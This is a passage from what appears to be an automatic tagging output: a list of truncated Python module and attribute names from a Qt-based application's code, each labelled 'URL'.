'utils.li'], ['URL', 'qt.fo'], ['URL', 'qt.fo'], ['URL', 'config.py'], ['URL', 'usertypes.Ba'], ['URL', 'os.environ.ge'], ['URL', 'objects.qapp.pl'], ['URL', 'qtutils.ve'], ['URL', 'qtutils.ve'], ['URL', 'info.gl'], ['URL', 'info.ve'], ['URL', 'info.ve'], ['URL', 'config.val.co'], ['URL', 'config.py'], ['URL', 'usertypes.Ba'], ['URL', 'qtutils.is'], ['URL', 'QSslSocket.su'], ['URL', 'qtutils.ve'], ['URL', 'msgbox.ms'], ['URL', 'QMessageBox.Cr'], ['URL', 'usertypes.Exit.er'], ['URL', 'log.in'], ['URL', 'html.es'], ['URL', 'html.es'], ['URL', 'msgbox.ms'], ['URL', 'QMessageBox.Cr'], ['URL', 'usertypes.Exit.er'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'html.es'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'html.es'], ['URL', 'configfiles.st'], ['URL', 'qtutils.ve'], ['URL', 'log.init.in'], ['URL', 'os.path.jo'], ['URL', 'standarddir.ca'], ['URL', 'os.pa'], ['URL', 'configfiles.st'], ['URL', 'qtutils.ve'], ['URL', 'configfiles.st'], ['URL', 
'configfiles.st'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'log.init.in'], ['URL', 'os.pa'], ['URL', 'shutil.mo'], ['URL', 'usertypes.Ba'], ['URL', 'objects.ba'], ['URL', 'objects.ba'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'argparse.Na'], ['URL', 'savemanager.Sa'], ['URL', 'args.no'], ['URL', 'checker.ch']]"